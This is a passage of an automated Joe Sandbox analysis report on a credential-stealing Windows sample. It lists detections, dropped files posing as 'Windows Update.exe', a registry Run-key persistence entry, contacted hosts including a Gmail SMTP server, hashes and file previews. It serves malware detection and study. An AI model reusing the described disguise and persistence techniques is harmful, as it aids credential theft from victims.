                          Sample_B.exe | 100% | Avira | SPR/Tool.MailPassView.473
                          Sample_B.exe | 100% | Joe Sandbox ML | 

                          Dropped Files

                          Source | Detection | Scanner | Label
                          C:\Users\user\AppData\Roaming\Windows Update.exe | 100% | Avira | TR/AD.MExecute.lzrac
                          C:\Users\user\AppData\Roaming\Windows Update.exe | 100% | Avira | SPR/Tool.MailPassView.473
                          C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 100% | Avira | TR/AD.MExecute.lzrac
                          C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 100% | Avira | SPR/Tool.MailPassView.473
                          C:\Users\user\AppData\Roaming\Windows Update.exe | 100% | Joe Sandbox ML | 
                          C:\Users\user\AppData\Roaming\WindowsUpdate.exe | 100% | Joe Sandbox ML | 

                          Unpacked PE Files

                          Source | Detection | Scanner | Label
                          0.0.Sample_B.exe.bc0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                          0.0.Sample_B.exe.bc0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                          2.2.Windows Update.exe.ee0000.1.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                          2.2.Windows Update.exe.ee0000.1.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                          0.2.Sample_B.exe.bc0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                          0.2.Sample_B.exe.bc0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                          2.0.Windows Update.exe.ee0000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                          2.0.Windows Update.exe.ee0000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473

                          Domains

                          Source | Detection | Scanner | Label
                          cdn.digicertcdn.com | 0% | Virustotal | 
                          163.190.5.0.in-addr.arpa | 0% | Virustotal | 

                          URLs

                          Source | Detection | Scanner | Label
                          http://ocsp.entrust.net03 | 0% | URL Reputation | safe
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
                          http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation | safe
                          http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
                          http://ocsp.pki.goog/gsr202 | 0% | URL Reputation | safe
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
                          https://pki.goog/repository/0 | 0% | URL Reputation | safe
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
                          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
                          http://ocsp.pki.goog/gts1o1core0 | 0% | URL Reputation | safe
                          http://crl.pki.goog/GTS1O1core.crl0 | 0% | URL Reputation | safe
                          http://www.%s.comPA | 0% | URL Reputation | safe
                          http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
                          http://ocsp.entrust.net0D | 0% | URL Reputation | safe

                          Domains and IPs

                          Contacted Domains

                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          whatismyipaddress.com | 104.16.155.36 | true | false |  | high
                          cdn.digicertcdn.com | 104.18.10.39 | true | false |  | unknown
                          smtp.gmail.com | 66.102.1.108 | true | false |  | high
                          163.190.5.0.in-addr.arpa | unknown | unknown | true |  | unknown

                              Contacted URLs

                          Name | Malicious | Antivirus Detection | Reputation
                          http://whatismyipaddress.com/ | false |  | high

                                URLs from Memory and Binaries

                          Name | Source | Malicious | Antivirus Detection | Reputation
                          http://www.windows.com/pctv. | Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | false |  | high
                          http://investor.msn.com | Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | false |  | high
                          http://www.msnbc.com/news/ticker.txt | Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | false |  | high
                          http://crl.entrust.net/server1.crl0 | Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | false |  | high
                          http://ocsp.entrust.net03 | Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://pki.goog/gsr2/GTS1O1.crt0 | Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.diginotar.nl/cps/pkioverheid0 | Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://ocsp.pki.goog/gsr202 | Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.hotmail.com/oe | Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | false |  | high
                          https://pki.goog/repository/0 | Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmp | false |  | high
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.icra.org/vocabulary/. | Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122804139.0000000008F87000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2113827446.0000000004A30000.00000002.00000001.sdmp | false |  | high
                          http://ocsp.pki.goog/gts1o1core0 | Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://investor.msn.com/ | Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2122590766.0000000008DA0000.00000002.00000001.sdmp | false |  | high
                          http://crl.pki.goog/GTS1O1core.crl0 | Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://whatismyipaddress.com/- | Sample_B.exe | false |  | high
                          http://www.%s.comPA | Sample_B.exe, 00000000.00000002.2077174925.00000000049F0000.00000002.00000001.sdmp, Windows Update.exe, 00000002.00000002.2113827446.0000000004A30000.00000002.00000001.sdmp | false | URL Reputation: safe | low
                          https://login.yahoo.com/config/login | Sample_B.exe, Windows Update.exe | false |  | high
                          http://www.site.com/logs.php | Windows Update.exe, 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp | false |  | high
                          http://crl.pki.goog/gsr2/gsr2.crl0? | Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.nirsoft.net/ | Sample_B.exe | false |  | high
                          http://ocsp.entrust.net0D | Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                          https://secure.comodo.com/CPS0 | Windows Update.exe, 00000002.00000002.2115217627.000000000548F000.00000004.00000001.sdmp | false |  | high
                          http://crl.entrust.net/2048ca.crl0 | Windows Update.exe, 00000002.00000002.2115241633.00000000054B2000.00000004.00000001.sdmp | false |  | high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.16.155.36 | unknown | United States | 13335 | CLOUDFLARENETUS | false
66.102.1.108 | unknown | United States | 15169 | GOOGLEUS | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 354163
Start date: 17.02.2021
Start time: 14:15:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 0s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Sample_B.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/15@6/2
EGA Information:
• Successful, ratio: 66.7%
HDC Information:
• Successful, ratio: 11.4% (good quality ratio 8.2%)
• Quality average: 48.9%
• Quality standard deviation: 36.4%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 283
• Number of non-executed functions: 36
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.18.10.39, 2.20.142.210, 2.20.142.209
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, watson.microsoft.com, blobcollector.events.data.trafficmanager.net, cacerts.digicert.com, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtEnumerateValueKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
14:15:33 | API Interceptor | 24x Sleep call for process: Sample_B.exe modified
14:15:35 | API Interceptor | 137x Sleep call for process: Windows Update.exe modified
14:15:39 | API Interceptor | 85x Sleep call for process: dw20.exe modified
14:15:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
14:15:51 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                CLOUDFLARENETUSSecuriteInfo.com.Trojan.Inject4.6572.30773.exeGet hashmaliciousBrowse
                                                                                • 172.67.188.154
                                                                                index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                • 104.20.184.68
                                                                                f_0008a8.exeGet hashmaliciousBrowse
                                                                                • 104.16.18.94
                                                                                RibermoldOrder 180827.exeGet hashmaliciousBrowse
                                                                                • 172.67.188.154
                                                                                index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                f6TW7Ob4aY.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                ew2c3sE5Po.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                TPYY2n7hzn.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                ZXKG6rCJwg.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                YWOro8qqYg.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                cRoVRprbi1.dllGet hashmaliciousBrowse
                                                                                • 104.20.185.68
                                                                                45tj9pDUII.dll (malicious) • 104.20.185.68
                                                                                3I3ECIc9us.dll (malicious) • 104.20.185.68
                                                                                VifzEYDt4f.dll (malicious) • 104.20.184.68
                                                                                aMvqQZ69tk.dll (malicious) • 104.20.184.68
                                                                                BpV9PHuNll.dll (malicious) • 104.20.184.68
                                                                                dxjcxlYNoQ.dll (malicious) • 104.20.185.68
                                                                                wildix-collaboration-mobile.apk (malicious) • 104.22.10.83
                                                                                GOOGLEUSf_0008a8.exe (malicious) • 8.8.4.4
                                                                                wildix-collaboration-mobile.apk (malicious) • 142.250.180.131
                                                                                mWxzYlRCUi.exe (malicious) • 34.102.136.180
                                                                                wildix-collaboration-mobile.apk (malicious) • 142.250.184.42
                                                                                Credit Card & Booking details.exe (malicious) • 34.102.136.180
                                                                                DnHeI10lQ6.exe (malicious) • 34.102.136.180
                                                                                q9xB9DE3RA.exe (malicious) • 34.102.136.180
                                                                                Cargo_remitP170201.xlsx (malicious) • 34.102.136.180
                                                                                OEVGVSOGAH.dll (malicious) • 216.58.206.65
                                                                                LeaveHomeSafe_1.1.4_#U5b89#U5fc3#U72483.apk (malicious) • 142.250.184.42
                                                                                plutonium.exe (malicious) • 8.8.8.8
                                                                                Quotation.exe (malicious) • 34.102.136.180
                                                                                sBt_8xKw.apk (malicious) • 216.58.198.42
                                                                                cLMBOaIYSO.exe (malicious) • 35.228.43.35
                                                                                51BfqRtUI9.exe (malicious) • 34.102.136.180
                                                                                X2Q8MaK1Zm.docx (malicious) • 216.58.208.131
                                                                                X2Q8MaK1Zm.docx (malicious) • 172.253.120.155
                                                                                dAIyRK9gO7.exe (malicious) • 8.8.8.8
                                                                                SU9Gm5Pom3.exe (malicious) • 34.102.136.180
                                                                                9j4sD6PmsW.exe (malicious) • 34.102.136.180

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):914
                                                                                Entropy (8bit):7.367371959019618
                                                                                Encrypted:false
                                                                                SSDEEP:24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF
                                                                                MD5:E4A68AC854AC5242460AFD72481B2A44
                                                                                SHA1:DF3C24F9BFD666761B268073FE06D1CC8D4F82A4
                                                                                SHA-256:CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F
                                                                                SHA-512:5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: 0...0..v........:......(d.....0...*.H........0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20...130801120000Z..380115120000Z0a1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1 0...U....DigiCert Global Root G20.."0...*.H.............0.........7.4.{k.h..Ju.F.!.....T......:..<z...k.-.^.$D.b.~..~.Tu ..P..c.l0.............7...CN.{,.../..:...%.k.`.`.O!I..g..a......2k..W.].......I.5-..Im.w..IK..U......#.LmE.....0..LU.'JW.|...s...J...P.......!..........g(.s..=Fv...!4M..E..I.....3.).......B0@0...U.......0....0...U...........0...U......N"T ....n..........90...*.H.............`g(.o.Hc.1..g..}<.J...+.._sw*2.9.gB.#.Eg5....a.4.. L....5.v..B..D...6t$Z.l..Y5..I....G*=./.\... ._SF..h...0.>1.....>5.._..pPpGA.W.N......./.%.u...o..Aq..*.O. U...E..D..2...SF.,...".K..E....X..}R..YC....&.o....7}.....w_v.<..]V[..fn.57.2.
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):59134
                                                                                Entropy (8bit):7.995450161616763
                                                                                Encrypted:true
                                                                                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):252
                                                                                Entropy (8bit):3.0734220895273965
                                                                                Encrypted:false
                                                                                SSDEEP:6:kKbgP4LDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:EQLutWOxSW0zeYrsMlU/
                                                                                MD5:DEFF45D6EE453F2E606204F981D12C2A
                                                                                SHA1:37196590CCAB4D0DA1ECF8A2C7CD5D3B9057DF9E
                                                                                SHA-256:E9D137AC1323596442F223D79DE22A4A34980B7BC84BD51EA5B7EDD07A2994E2
                                                                                SHA-512:4F18E2CAA196C0C6910B28C0F74BCDF1ADC35DB1395CA7F3C7F00925EB9454FF76F729E17916B57F845CD06FC49CD25D24F32E57346972DE36BBC9C455DDD853
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: p...... ....j...5..nz...(....................................................... ............n...u..................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.G.l.o.b.a.l.R.o.o.t.G.2...c.r.t...".5.a.2.8.6.4.1.7.-.3.9.2."...
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):328
                                                                                Entropy (8bit):3.080958610796429
                                                                                Encrypted:false
                                                                                SSDEEP:6:kKPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:+3kPlE99SNxAhUeo+aKt
                                                                                MD5:5DE2DFA843897E36DAC2D1F4FCB7F360
                                                                                SHA1:717349376361E7175072835A0051A855DBF32BC8
                                                                                SHA-256:EB01F1C833C14A267597922655659DE490CBF8548F7C46B305C44896A2E8886C
                                                                                SHA-512:F463646650855F0493117ACC769D77DA705C69F7F1880AED8A17689223F5F2839C6340668A9222DCC884C98E64D32EC40C85E356CC62964D3BA77B5DFA6D809D
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: p...... .........|Lnz...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_windows update.e_8def7a6b85a0513a7da3debaf0f7a2c3a14caff_0b1db1a4\Report.wer
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):13186
                                                                                Entropy (8bit):3.716046470811688
                                                                                Encrypted:false
                                                                                SSDEEP:192:oTyzzRiyXg9uclA90TfxtdOZC0fFj6IGbQA3ai63yOt7:lzRi4yTOhGmr
                                                                                MD5:EF7C318F45EBB3503516CC69659E9F7B
                                                                                SHA1:D414EF598B7B337B1132FB28DD4B80C43D479E06
                                                                                SHA-256:A74CC73AED01F82B779695EF91898E57CA039EAEF67747838793658E5FFC3AB4
                                                                                SHA-512:ED4B52B026CDB3276F93C8349CDEF77F5DCC21D1C6D521D4402C5B29398A6DA748B9836BA74FE0D23F6892FE4882E3A6FD424BBEFEE71582822A0BFEC49B44FB
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.0.7.3.7.3.9.2.8.1.8.3.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.0.7.3.7.4.0.8.3.7.0.4.3.0.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.0.7.6.8.f.3.-.7.1.6.d.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....W.O.W.6.4.=.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.4.9.8.8.7.0.9.8.9.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.5.1.2.1.7.6.3.3.1.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.1.....S.i.g.[.0.]...V.a.l.u.e.=.w.i.n.d.o.w.s. .u.p.d.a.t.e...e.x.e.....S.i.g.[.1.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.2.....S.i.g.[.1.]...V.a.l.u.e.=.1...0...0...0.....S.i.g.[.2.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.3.....S.i.g.[.2.]...V.a.l.u.e.=.6.0.1.6.c.1.0.9.....S.i.g.[.3.]...N.a.m.e.=.P.r.o.b.l.e.m. .S.i.g.n.a.t.u.r.e. .0.4.....S.i.g.[.3.]...V.a.l.u.e.=.P.h.u.l.l.i.....S.i.g.[.4.]...
                                                                                C:\Users\user\AppData\Local\Temp\CabAB00.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):59134
                                                                                Entropy (8bit):7.995450161616763
                                                                                Encrypted:true
                                                                                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                C:\Users\user\AppData\Local\Temp\SysInfo.txt
                                                                                Process:C:\Users\user\Desktop\Sample_B.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):35
                                                                                Entropy (8bit):4.226150431961057
                                                                                Encrypted:false
                                                                                SSDEEP:3:oNSzORW2EM:oNSzOA2v
                                                                                MD5:6A5A5B0A44E4EB0E35D0ED1ED597CB58
                                                                                SHA1:1EAE2A59836272E8B62BD8AF9F231E5FF23BC8AB
                                                                                SHA-256:A4DB033255E7CEDD4E48A95805F033DD9A3A1AF789440EB627878C1C944C7483
                                                                                SHA-512:F21D968FE9400557E881BA3C354073659AA68E0B30D4485D519887ACF62A699730CE59B701D9245056D629C0D25C7F117E64A313B7CE37B6C6737FD9BD6E655F
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview: C:\Users\user\Desktop\Sample_B.exe
                                                                                C:\Users\user\AppData\Local\Temp\TarAB01.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):152788
                                                                                Entropy (8bit):6.316654432555028
                                                                                Encrypted:false
                                                                                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
